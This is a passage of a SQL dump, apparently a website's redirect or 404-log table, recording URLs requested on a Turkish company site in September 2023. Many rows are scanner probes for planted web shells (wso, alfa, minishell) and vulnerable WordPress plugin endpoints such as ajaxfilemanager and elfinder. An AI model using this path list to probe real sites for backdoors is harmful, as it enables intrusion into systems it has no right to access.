00:00:00',301),(33137,'http://3s-technologies.com.tr/tr/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'','',1,0,'2023-09-13 04:37:03','0000-00-00 00:00:00',301),(33138,'http://3s-technologies.com.tr/en/ajbxhvgr.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-13 17:31:28','0000-00-00 00:00:00',301),(33139,'https://3s-technologies.com.tr/en/wywzbhmx.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-13 17:31:30','0000-00-00 00:00:00',301),(33140,'http://3s-technologies.com.tr/tr/wp-content/plugins/pica-photo-gallery/css/style.css',NULL,'','',1,0,'2023-09-14 11:08:20','0000-00-00 00:00:00',301),(33141,'http://3s-technologies.com.tr/tr/init.php',NULL,'http://3s-technologies.com.tr//init.php','',140,0,'2023-09-15 00:43:22','0000-00-00 00:00:00',301),(33142,'http://3s-technologies.com.tr/tr/hehe.php',NULL,'http://3s-technologies.com.tr//hehe.php','',95,0,'2023-09-15 00:43:28','0000-00-00 00:00:00',301),(33143,'http://3s-technologies.com.tr/tr/uph.php',NULL,'http://3s-technologies.com.tr//uph.php','',2,0,'2023-09-15 00:43:30','0000-00-00 00:00:00',301),(33144,'http://3s-technologies.com.tr/tr/google.php',NULL,'http://3s-technologies.com.tr//google.php','',34,0,'2023-09-15 00:43:34','0000-00-00 00:00:00',301),(33145,'http://3s-technologies.com.tr/tr/503.php',NULL,'http://3s-technologies.com.tr//503.php','',8,0,'2023-09-15 00:43:35','0000-00-00 00:00:00',301),(33146,'http://3s-technologies.com.tr/tr/update.php',NULL,'http://3s-technologies.com.tr//update.php','',55,0,'2023-09-15 00:43:35','0000-00-00 00:00:00',301),(33147,'http://3s-technologies.com.tr/tr/lock.php',NULL,'http://3s-technologies.com.tr//lock.php','',123,0,'2023-09-15 00:43:36','0000-00-00 00:00:00',301),(33148,'http://3s-technologies.com.tr/tr/mass.php',NULL,'http://3s-technologies.com.tr//mass.php','',15,0,'2023-09-15 00:43:37','0000-00-00 00:00:00',301),(33149,'http://3s-technologies.com.tr/tr/1877.php',NULL,'http://3s-technologies.com.tr//1877.php','',3,0,'2023-09-15 00:43:38','0000-00-00 00:00:00',301),(33150,'http://3s-technologies.com.tr/tr/lyda.php',NULL,'http://3s-technologies.com.tr//lyda.php','',2,0,'2023-09-15 00:43:40','0000-00-00 00:00:00',301),(33151,'http://3s-technologies.com.tr/tr/plugins.php',NULL,'http://3s-technologies.com.tr//plugins.php','',232,0,'2023-09-15 00:43:42','0000-00-00 00:00:00',301),(33152,'http://3s-technologies.com.tr/tr/tesla.php',NULL,'http://3s-technologies.com.tr//tesla.php','',4,0,'2023-09-15 00:43:44','0000-00-00 00:00:00',301),(33153,'http://3s-technologies.com.tr/tr/classwithtostring.php',NULL,'http://3s-technologies.com.tr//classwithtostring.php','',649,0,'2023-09-15 00:43:46','0000-00-00 00:00:00',301),(33154,'http://3s-technologies.com.tr/tr/an.php',NULL,'http://3s-technologies.com.tr//an.php','',122,0,'2023-09-15 00:43:46','0000-00-00 00:00:00',301),(33155,'http://3s-technologies.com.tr/tr/zz.php',NULL,'http://3s-technologies.com.tr//zz.php','',15,0,'2023-09-15 00:43:46','0000-00-00 00:00:00',301),(33156,'http://3s-technologies.com.tr/tr/by.php',NULL,'http://3s-technologies.com.tr//by.php','',44,0,'2023-09-15 00:43:48','0000-00-00 00:00:00',301),(33157,'http://3s-technologies.com.tr/tr/v3n0m.php',NULL,'http://3s-technologies.com.tr//v3n0m.php','',2,0,'2023-09-15 00:43:49','0000-00-00 00:00:00',301),(33158,'http://3s-technologies.com.tr/tr/tnt.php',NULL,'http://3s-technologies.com.tr//tnt.php','',29,0,'2023-09-15 00:43:50','0000-00-00 00:00:00',301),(33159,'http://3s-technologies.com.tr/tr/exit.php',NULL,'http://3s-technologies.com.tr//exit.php','',2,0,'2023-09-15 00:43:50','0000-00-00 00:00:00',301),(33160,'http://3s-technologies.com.tr/tr/leet.php',NULL,'http://3s-technologies.com.tr//leet.php','',2,0,'2023-09-15 00:43:51','0000-00-00 00:00:00',301),(33161,'http://3s-technologies.com.tr/tr/lufi.php',NULL,'http://3s-technologies.com.tr//lufi.php','',2,0,'2023-09-15 00:43:51','0000-00-00 00:00:00',301),(33162,'http://3s-technologies.com.tr/tr/ch.php',NULL,'http://3s-technologies.com.tr//ch.php','',1,0,'2023-09-15 00:43:53','0000-00-00 00:00:00',301),(33163,'http://3s-technologies.com.tr/tr/minishell.php',NULL,'http://3s-technologies.com.tr//minishell.php','',9,0,'2023-09-15 00:43:55','0000-00-00 00:00:00',301),(33164,'http://3s-technologies.com.tr/tr/mad.php',NULL,'http://3s-technologies.com.tr//mad.php','',10,0,'2023-09-15 00:43:55','0000-00-00 00:00:00',301),(33165,'http://3s-technologies.com.tr/tr/private.php',NULL,'http://3s-technologies.com.tr//private.php','',4,0,'2023-09-15 00:43:56','0000-00-00 00:00:00',301),(33166,'http://3s-technologies.com.tr/tr/h4xor.php',NULL,'http://3s-technologies.com.tr//h4xor.php','',2,0,'2023-09-15 00:43:57','0000-00-00 00:00:00',301),(33167,'http://3s-technologies.com.tr/tr/font-editor.php',NULL,'http://3s-technologies.com.tr//font-editor.php','',1,0,'2023-09-15 00:43:58','0000-00-00 00:00:00',301),(33168,'http://3s-technologies.com.tr/tr/plugin-install.php',NULL,'http://3s-technologies.com.tr//plugin-install.php','',3,0,'2023-09-15 00:43:58','0000-00-00 00:00:00',301),(33169,'http://3s-technologies.com.tr/tr/theme-install.php',NULL,'http://3s-technologies.com.tr//theme-install.php','',1,0,'2023-09-15 00:43:59','0000-00-00 00:00:00',301),(33170,'http://3s-technologies.com.tr/tr/end.php',NULL,'http://3s-technologies.com.tr//end.php','',6,0,'2023-09-15 00:43:59','0000-00-00 00:00:00',301),(33171,'http://3s-technologies.com.tr/tr/access.php',NULL,'http://3s-technologies.com.tr//access.php','',36,0,'2023-09-15 00:43:59','0000-00-00 00:00:00',301),(33172,'http://3s-technologies.com.tr/tr/contents.php',NULL,'http://3s-technologies.com.tr//contents.php','',6,0,'2023-09-15 00:44:00','0000-00-00 00:00:00',301),(33173,'http://3s-technologies.com.tr/tr/__1975.php',NULL,'http://3s-technologies.com.tr//__1975.php','',1,0,'2023-09-15 00:44:01','0000-00-00 00:00:00',301),(33174,'http://3s-technologies.com.tr/tr/kill.php',NULL,'http://3s-technologies.com.tr//kill.php','',2,0,'2023-09-15 00:44:01','0000-00-00 00:00:00',301),(33175,'http://3s-technologies.com.tr/tr/xlettt.php',NULL,'http://3s-technologies.com.tr//xlettt.php','',1,0,'2023-09-15 00:44:02','0000-00-00 00:00:00',301),(33176,'http://3s-technologies.com.tr/tr/shellx.php',NULL,'http://3s-technologies.com.tr//shellx.php','',3,0,'2023-09-15 00:44:02','0000-00-00 00:00:00',301),(33177,'http://3s-technologies.com.tr/tr/lock0360.php',NULL,'http://3s-technologies.com.tr//lock0360.php','',1,0,'2023-09-15 00:44:03','0000-00-00 00:00:00',301),(33178,'http://3s-technologies.com.tr/tr/indexs.php',NULL,'http://3s-technologies.com.tr//indexs.php','',2,0,'2023-09-15 00:44:03','0000-00-00 00:00:00',301),(33179,'http://3s-technologies.com.tr/tr/hanna1337.php',NULL,'http://3s-technologies.com.tr//hanna1337.php','',2,0,'2023-09-15 00:44:03','0000-00-00 00:00:00',301),(33180,'http://3s-technologies.com.tr/tr/ton.php',NULL,'http://3s-technologies.com.tr//ton.php','',64,0,'2023-09-15 00:44:04','0000-00-00 00:00:00',301),(33181,'http://3s-technologies.com.tr/tr/gecko.php',NULL,'http://3s-technologies.com.tr//gecko.php','',241,0,'2023-09-15 00:44:06','0000-00-00 00:00:00',301),(33182,'http://3s-technologies.com.tr/tr/wsoyanzorng.php',NULL,'http://3s-technologies.com.tr//wsoyanzorng.php','',1,0,'2023-09-15 00:44:07','0000-00-00 00:00:00',301),(33183,'http://3s-technologies.com.tr/tr/xmlrpc2.php',NULL,'http://3s-technologies.com.tr//xmlrpc2.php','',2,0,'2023-09-15 00:44:08','0000-00-00 00:00:00',301),(33184,'http://3s-technologies.com.tr/tr/evil.php',NULL,'http://3s-technologies.com.tr//evil.php','',8,0,'2023-09-15 00:44:09','0000-00-00 00:00:00',301),(33185,'http://3s-technologies.com.tr/tr/demo.php',NULL,'http://3s-technologies.com.tr//demo.php','',3,0,'2023-09-15 00:44:09','0000-00-00 00:00:00',301),(33186,'http://3s-technologies.com.tr/tr/tmpshell.php',NULL,'http://3s-technologies.com.tr//tmpshell.php','',2,0,'2023-09-15 00:44:10','0000-00-00 00:00:00',301),(33187,'http://3s-technologies.com.tr/tr/moto.php',NULL,'http://3s-technologies.com.tr//moto.php','',1,0,'2023-09-15 00:44:10','0000-00-00 00:00:00',301),(33188,'http://3s-technologies.com.tr/tr/columns.php',NULL,'http://3s-technologies.com.tr//columns.php','',1,0,'2023-09-15 00:44:10','0000-00-00 00:00:00',301),(33189,'http://3s-technologies.com.tr/tr/wp-includes/atom.php',NULL,'http://3s-technologies.com.tr//wp-includes/atom.php','',1,0,'2023-09-15 00:44:11','0000-00-00 00:00:00',301),(33190,'http://3s-technologies.com.tr/tr/utchiha_uploader.php',NULL,'http://3s-technologies.com.tr//utchiha_uploader.php','',1,0,'2023-09-15 00:44:12','0000-00-00 00:00:00',301),(33191,'http://3s-technologies.com.tr/tr/deadcode1975.php',NULL,'http://3s-technologies.com.tr//Deadcode1975.php','',1,0,'2023-09-15 00:44:13','0000-00-00 00:00:00',301),(33192,'http://3s-technologies.com.tr/tr/wp-content/wp-conf.php',NULL,'http://3s-technologies.com.tr//wp-content/wp-conf.php','',1,0,'2023-09-15 00:44:14','0000-00-00 00:00:00',301),(33193,'http://3s-technologies.com.tr/tr/1975.php',NULL,'http://3s-technologies.com.tr//1975.php','',15,0,'2023-09-15 00:44:17','0000-00-00 00:00:00',301),(33194,'http://3s-technologies.com.tr/tr/wp-admin/1975.php',NULL,'http://3s-technologies.com.tr//wp-admin/1975.php','',1,0,'2023-09-15 00:44:18','0000-00-00 00:00:00',301),(33195,'http://3s-technologies.com.tr/tr/wp-content/index.php',NULL,'http://3s-technologies.com.tr/wp-content/index.php','',461,0,'2023-09-15 00:44:18','0000-00-00 00:00:00',301),(33196,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/1877.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/dzs-zoomsounds/1877.php','',7,0,'2023-09-15 00:44:20','0000-00-00 00:00:00',301),(33197,'http://3s-technologies.com.tr/tr/f0x.php',NULL,'http://3s-technologies.com.tr//F0x.php','',13,0,'2023-09-15 00:44:23','0000-00-00 00:00:00',301),(33198,'http://3s-technologies.com.tr/tr/wp-admin/wp-trc.php',NULL,'http://3s-technologies.com.tr//wp-admin/wp-trc.php','',1,0,'2023-09-15 00:44:24','0000-00-00 00:00:00',301),(33199,'http://3s-technologies.com.tr/tr/alfaindex.php',NULL,'http://3s-technologies.com.tr//alfaindex.php','',8,0,'2023-09-15 00:44:25','0000-00-00 00:00:00',301),(33200,'http://3s-technologies.com.tr/tr/wp-content/alfa.php',NULL,'http://3s-technologies.com.tr//wp-content/alfa.php','',27,0,'2023-09-15 00:44:25','0000-00-00 00:00:00',301),(33201,'http://3s-technologies.com.tr/tr/snd.php',NULL,'http://3s-technologies.com.tr//snd.php','',9,0,'2023-09-15 00:44:26','0000-00-00 00:00:00',301),(33202,'http://3s-technologies.com.tr/tr/alfanew.php7',NULL,'http://3s-technologies.com.tr//alfanew.php7','',132,0,'2023-09-15 00:44:27','0000-00-00 00:00:00',301),(33203,'http://3s-technologies.com.tr/tr/lalala.php',NULL,'http://3s-technologies.com.tr//lalala.php','',3,0,'2023-09-15 00:44:27','0000-00-00 00:00:00',301),(33204,'http://3s-technologies.com.tr/tr/0x55.php',NULL,'http://3s-technologies.com.tr//0x55.php','',1,0,'2023-09-15 00:44:28','0000-00-00 00:00:00',301),(33205,'http://3s-technologies.com.tr/tr/b1a3k.php',NULL,'http://3s-technologies.com.tr/b1a3k.php','',2,0,'2023-09-15 00:44:29','0000-00-00 00:00:00',301),(33206,'http://3s-technologies.com.tr/tr/wp-content/plugins/index.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/index.php','',355,0,'2023-09-15 00:44:29','0000-00-00 00:00:00',301),(33207,'http://3s-technologies.com.tr/tr/byp.php',NULL,'http://3s-technologies.com.tr//byp.php','',237,0,'2023-09-15 00:44:30','0000-00-00 00:00:00',301),(33208,'http://3s-technologies.com.tr/tr/wp-includes/class-json-ajax-session.php',NULL,'http://3s-technologies.com.tr//wp-includes/class-json-ajax-session.php','',22,0,'2023-09-15 00:44:31','0000-00-00 00:00:00',301),(33209,'http://3s-technologies.com.tr/tr/wp-admin/wp-22.php',NULL,'http://3s-technologies.com.tr//wp-admin/wp-22.php','',1,0,'2023-09-15 00:44:32','0000-00-00 00:00:00',301),(33210,'http://3s-technologies.com.tr/tr/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php','',1,0,'2023-09-15 00:44:32','0000-00-00 00:00:00',301),(33211,'http://3s-technologies.com.tr/tr/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',1,0,'2023-09-15 00:44:33','0000-00-00 00:00:00',301),(33212,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresss3cll/up.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/wordpresss3cll/up.php','',6,0,'2023-09-15 00:44:33','0000-00-00 00:00:00',301),(33213,'http://3s-technologies.com.tr/tr/wp-content/plugins/anttt/simple.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/anttt/simple.php','',5,0,'2023-09-15 00:44:33','0000-00-00 00:00:00',301),(33214,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-upload/roobots.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/wp-file-upload/ROOBOTS.php','',1,0,'2023-09-15 00:44:34','0000-00-00 00:00:00',301),(33215,'http://3s-technologies.com.tr/tr/wp-content/plugins/w0rdpr3ssnew/about.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/w0rdpr3ssnew/about.php','',1,0,'2023-09-15 00:44:34','0000-00-00 00:00:00',301),(33216,'http://3s-technologies.com.tr/tr/utchiha505.php',NULL,'http://3s-technologies.com.tr//utchiha505.php','',4,0,'2023-09-15 00:44:36','0000-00-00 00:00:00',301),(33217,'http://3s-technologies.com.tr/tr/fan.php',NULL,'http://3s-technologies.com.tr//fan.php','',2,0,'2023-09-15 00:44:36','0000-00-00 00:00:00',301),(33218,'http://3s-technologies.com.tr/tr/moon.php',NULL,'http://3s-technologies.com.tr//moon.php','',382,0,'2023-09-15 00:44:36','0000-00-00 00:00:00',301),(33219,'http://3s-technologies.com.tr/tr/update-core.php',NULL,'http://3s-technologies.com.tr//update-core.php','',1,0,'2023-09-15 00:44:37','0000-00-00 00:00:00',301),(33220,'http://3s-technologies.com.tr/tr/user-new.php',NULL,'http://3s-technologies.com.tr//user-new.php','',1,0,'2023-09-15 00:44:37','0000-00-00 00:00:00',301),(33221,'http://3s-technologies.com.tr/tr/customize.php',NULL,'http://3s-technologies.com.tr//customize.php','',15,0,'2023-09-15 00:44:38','0000-00-00 00:00:00',301),(33222,'http://3s-technologies.com.tr/tr/xzourt.php',NULL,'http://3s-technologies.com.tr//xzourt.php','',1,0,'2023-09-15 00:44:38','0000-00-00 00:00:00',301),(33223,'http://3s-technologies.com.tr/tr/credits.php',NULL,'http://3s-technologies.com.tr//credits.php','',37,0,'2023-09-15 00:44:39','0000-00-00 00:00:00',301),(33224,'http://3s-technologies.com.tr/tr/users.php',NULL,'http://3s-technologies.com.tr//users.php','',201,0,'2023-09-15 00:44:39','0000-00-00 00:00:00',301),(33225,'http://3s-technologies.com.tr/tr/edit-comments.php',NULL,'http://3s-technologies.com.tr//edit-comments.php','',22,0,'2023-09-15 00:44:40','0000-00-00 00:00:00',301),(33226,'http://3s-technologies.com.tr/tr/term.php',NULL,'http://3s-technologies.com.tr//term.php','',66,0,'2023-09-15 00:44:40','0000-00-00 00:00:00',301),(33227,'http://3s-technologies.com.tr/tr/text.php',NULL,'http://3s-technologies.com.tr//text.php','',135,0,'2023-09-15 00:44:40','0000-00-00 00:00:00',301),(33228,'http://3s-technologies.com.tr/tr/themes.php',NULL,'http://3s-technologies.com.tr//themes.php','',424,0,'2023-09-15 00:44:41','0000-00-00 00:00:00',301),(33229,'http://3s-technologies.com.tr/tr/tools.php',NULL,'http://3s-technologies.com.tr//tools.php','',14,0,'2023-09-15 00:44:41','0000-00-00 00:00:00',301),(33230,'http://3s-technologies.com.tr/tr/tron.php',NULL,'http://3s-technologies.com.tr//tron.php','',2,0,'2023-09-15 00:44:42','0000-00-00 00:00:00',301),(33231,'http://3s-technologies.com.tr/tr/wp-includes/home.php?xsec=team',NULL,'http://3s-technologies.com.tr//wp-includes/home.php?xsec=team','',1,0,'2023-09-15 00:44:43','0000-00-00 00:00:00',301),(33232,'http://3s-technologies.com.tr/tr/wp-content/home.php?xsec=team',NULL,'http://3s-technologies.com.tr//wp-content/home.php?xsec=team','',1,0,'2023-09-15 00:44:43','0000-00-00 00:00:00',301),(33233,'http://3s-technologies.com.tr/tr/wp-admin/home.php?xsec=team',NULL,'http://3s-technologies.com.tr//wp-admin/home.php?xsec=team','',1,0,'2023-09-15 00:44:43','0000-00-00 00:00:00',301),(33234,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-stab/casper.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/core-stab/casper.php','',1,0,'2023-09-15 00:44:44','0000-00-00 00:00:00',301),(33235,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/casper.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/classic/inc/casper.php','',1,0,'2023-09-15 00:44:44','0000-00-00 00:00:00',301),(33236,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/casperexv1.php',NULL,'http://3s-technologies.com.tr//wp-admin/css/colors/blue/CasperExV1.php','',10,0,'2023-09-15 00:44:45','0000-00-00 00:00:00',301),(33237,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/random_bytes_cyclone.php',NULL,'http://3s-technologies.com.tr//wp-includes/random_compat/random_bytes_cyclone.php','',1,0,'2023-09-15 00:44:46','0000-00-00 00:00:00',301),(33238,'http://3s-technologies.com.tr/tr/r00t.php',NULL,'http://3s-technologies.com.tr//R00T.php','',9,0,'2023-09-15 00:44:46','0000-00-00 00:00:00',301),(33239,'http://3s-technologies.com.tr/tr/wp-content/plugins/xsid/marijuana.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/xsid/marijuana.php','',1,0,'2023-09-15 00:44:47','0000-00-00 00:00:00',301),(33240,'http://3s-technologies.com.tr/tr/wsu.php',NULL,'http://3s-technologies.com.tr//wsu.php','',2,0,'2023-09-15 00:44:47','0000-00-00 00:00:00',301),(33241,'http://3s-technologies.com.tr/tr/wp-content/plugins/topxoh/wdr.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/TOPXOH/wDR.php','',19,0,'2023-09-15 00:44:48','0000-00-00 00:00:00',301),(33242,'http://3s-technologies.com.tr/tr/wp-content/plugins/cache/cache.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/Cache/Cache.php','',99,0,'2023-09-15 00:44:48','0000-00-00 00:00:00',301),(33243,'http://3s-technologies.com.tr/tr/wp-content/plugins/instabuilder2/cache/plugins/moon.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/instabuilder2/cache/plugins/moon.php','',2,0,'2023-09-15 00:44:49','0000-00-00 00:00:00',301),(33244,'http://3s-technologies.com.tr/tr/wp-admin/wso112233.php',NULL,'http://3s-technologies.com.tr//wp-admin/wso112233.php','',3,0,'2023-09-15 00:44:49','0000-00-00 00:00:00',301),(33245,'http://3s-technologies.com.tr/tr/406.php',NULL,'http://3s-technologies.com.tr//406.php','',24,0,'2023-09-15 00:44:50','0000-00-00 00:00:00',301),(33246,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/uploader.php',NULL,'http://3s-technologies.com.tr//wp-admin/css/colors/blue/uploader.php','',7,0,'2023-09-15 00:44:51','0000-00-00 00:00:00',301),(33247,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519/ge/wp_blog.php',NULL,'http://3s-technologies.com.tr//wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php','',3,0,'2023-09-15 00:44:51','0000-00-00 00:00:00',301),(33248,'http://3s-technologies.com.tr/tr/wp-admin/network/db.php',NULL,'http://3s-technologies.com.tr//wp-admin/network/db.php','',2,0,'2023-09-15 00:44:52','0000-00-00 00:00:00',301),(33249,'http://3s-technologies.com.tr/tr/0x.php',NULL,'http://3s-technologies.com.tr//0x.php','',238,0,'2023-09-15 00:44:52','0000-00-00 00:00:00',301),(33250,'http://3s-technologies.com.tr/tr/wp-content/themes/welfare-charity/www.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/welfare-charity/www.php','',2,0,'2023-09-15 00:44:53','0000-00-00 00:00:00',301),(33251,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/includes/page/index.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/revslider/includes/page/index.php','',1,0,'2023-09-15 00:44:53','0000-00-00 00:00:00',301),(33252,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/includes/settings/index.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/elementor/includes/settings/index.php','',1,0,'2023-09-15 00:44:54','0000-00-00 00:00:00',301),(33253,'http://3s-technologies.com.tr/tr/wp-content/plugins/real/v.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/real/v.php','',8,0,'2023-09-15 00:44:55','0000-00-00 00:00:00',301),(33254,'http://3s-technologies.com.tr/tr/d7.php',NULL,'http://3s-technologies.com.tr//d7.php','',1,0,'2023-09-15 00:44:55','0000-00-00 00:00:00',301),(33255,'http://3s-technologies.com.tr/tr/wp-content/uploads/typehub/custom/.rxr.php?cmd=up',NULL,'http://3s-technologies.com.tr//wp-content/uploads/typehub/custom/.RxR.php?cmd=up','',1,0,'2023-09-15 00:44:56','0000-00-00 00:00:00',301),(33256,'http://3s-technologies.com.tr/tr/wp-content/cong.php',NULL,'http://3s-technologies.com.tr//wp-content/cong.php','',82,0,'2023-09-15 00:44:56','0000-00-00 00:00:00',301),(33257,'http://3s-technologies.com.tr/tr/wp-content/plugins/cache/dropdown.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/Cache/dropdown.php','',4,0,'2023-09-15 00:44:57','0000-00-00 00:00:00',301),(33258,'http://3s-technologies.com.tr/tr/ee.php',NULL,'http://3s-technologies.com.tr//ee.php','',129,0,'2023-09-15 00:44:57','0000-00-00 00:00:00',301),(33259,'http://3s-technologies.com.tr/tr/wp-content/themes/finley/min.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/finley/min.php','',19,0,'2023-09-15 00:44:59','0000-00-00 00:00:00',301),(33260,'http://3s-technologies.com.tr/tr/wp-admin/dropdown.php',NULL,'http://3s-technologies.com.tr//wp-admin/dropdown.php','',95,0,'2023-09-15 00:44:59','0000-00-00 00:00:00',301),(33261,'http://3s-technologies.com.tr/tr/wp-admin/wp_filemanager.php',NULL,'http://3s-technologies.com.tr//wp-admin/wp_filemanager.php','',1,0,'2023-09-15 00:44:59','0000-00-00 00:00:00',301),(33262,'http://3s-technologies.com.tr/tr/wp-includes/wp_filemanager.php',NULL,'http://3s-technologies.com.tr//wp-includes/wp_filemanager.php','',1,0,'2023-09-15 00:45:00','0000-00-00 00:00:00',301),(33263,'http://3s-technologies.com.tr/tr/wp-content/wp_filemanager.php',NULL,'http://3s-technologies.com.tr//wp-content/wp_filemanager.php','',2,0,'2023-09-15 00:45:00','0000-00-00 00:00:00',301),(33264,'http://3s-technologies.com.tr/tr/wp_filemanager.php',NULL,'http://3s-technologies.com.tr//wp_filemanager.php','',7,0,'2023-09-15 00:45:01','0000-00-00 00:00:00',301),(33265,'http://3s-technologies.com.tr/tr/wp-admin/network/subjects.php',NULL,'http://3s-technologies.com.tr//wp-admin/network/subjects.php','',2,0,'2023-09-15 00:45:01','0000-00-00 00:00:00',301),(33266,'http://3s-technologies.com.tr/tr/wp-includes/blocks/table/int/tmpl/index.php',NULL,'http://3s-technologies.com.tr//wp-includes/blocks/table/int/tmpl/index.php','',8,0,'2023-09-15 00:45:03','0000-00-00 00:00:00',301),(33267,'http://3s-technologies.com.tr/tr/wp-admin/includes/users.php',NULL,'http://3s-technologies.com.tr//wp-admin/includes/users.php','',32,0,'2023-09-15 00:45:05','0000-00-00 00:00:00',301),(33268,'http://3s-technologies.com.tr/tr/wp-admin/users.php',NULL,'http://3s-technologies.com.tr//wp-admin/users.php','',63,0,'2023-09-15 00:45:05','0000-00-00 00:00:00',301),(33269,'http://3s-technologies.com.tr/tr/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js',NULL,'','',2,0,'2023-09-15 17:28:42','0000-00-00 00:00:00',301),(33270,'http://3s-technologies.com.tr/en/wp1/wp-includes/wlwmanifest.xml',NULL,'3s-technologies.com.tr','',1,0,'2023-09-15 21:51:50','0000-00-00 00:00:00',301),(33271,'http://3s-technologies.com.tr/en/2022/wp-includes/wlwmanifest.xml',NULL,'3s-technologies.com.tr','',1,0,'2023-09-15 21:53:04','0000-00-00 00:00:00',301),(33272,'http://3s-technologies.com.tr/en/media/wp-includes/wlwmanifest.xml',NULL,'3s-technologies.com.tr','',1,0,'2023-09-15 21:53:19','0000-00-00 00:00:00',301),(33273,'http://3s-technologies.com.tr/en/2020/wp-includes/wlwmanifest.xml',NULL,'3s-technologies.com.tr','',1,0,'2023-09-15 21:55:16','0000-00-00 00:00:00',301),(33274,'http://3s-technologies.com.tr/en/ghrmjors.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-16 00:36:51','0000-00-00 00:00:00',301),(33275,'https://3s-technologies.com.tr/en/obkpcuhp.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-16 00:36:53','0000-00-00 00:00:00',301),(33276,'http://3s-technologies.com.tr/en/.well-known/admin.php',NULL,'www.google.com','',20,0,'2023-09-16 22:26:53','0000-00-00 00:00:00',301),(33277,'https://3s-technologies.com.tr/en/.well-known/acme-challenge/wp-signup.php',NULL,'www.google.com','',2,0,'2023-09-16 22:26:53','0000-00-00 00:00:00',301),(33278,'http://www.3s-technologies.com.tr/en/tsnpovhj.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-17 02:23:19','0000-00-00 00:00:00',301),(33279,'https://www.3s-technologies.com.tr/en/wtdjhamg.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-17 02:23:20','0000-00-00 00:00:00',301),(33280,'http://3s-technologies.com.tr/tr/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php',NULL,'','',1,0,'2023-09-17 03:27:04','0000-00-00 00:00:00',301),(33281,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_6-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_6-1024x724.jpg','',5,0,'2023-09-17 07:53:14','0000-00-00 00:00:00',301),(33282,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_8-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_8-1024x724.jpg','',5,0,'2023-09-17 07:53:40','0000-00-00 00:00:00',301),(33283,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_2-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_2-1024x724.jpg','',4,0,'2023-09-17 07:54:04','0000-00-00 00:00:00',301),(33284,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_5-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_5-1024x724.jpg','',4,0,'2023-09-17 07:54:30','0000-00-00 00:00:00',301),(33285,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_7-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_7-1024x724.jpg','',5,0,'2023-09-17 07:54:56','0000-00-00 00:00:00',301),(33286,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_4-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_4-1024x724.jpg','',4,0,'2023-09-17 07:55:21','0000-00-00 00:00:00',301),(33287,'https://www.3s-technologies.com.tr/tr/images/misc/temelelektronik_3-1024x724.jpg',NULL,'https://www.3s-technologies.com.tr/images/misc/TemelElektronik_3-1024x724.jpg','',4,0,'2023-09-17 07:55:46','0000-00-00 00:00:00',301),(33288,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/ess-310-left-400x464.jpg','',6,0,'2023-09-17 12:32:45','0000-00-00 00:00:00',301),(33289,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rhii.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/rhii.jpg','',4,0,'2023-09-17 14:40:28','0000-00-00 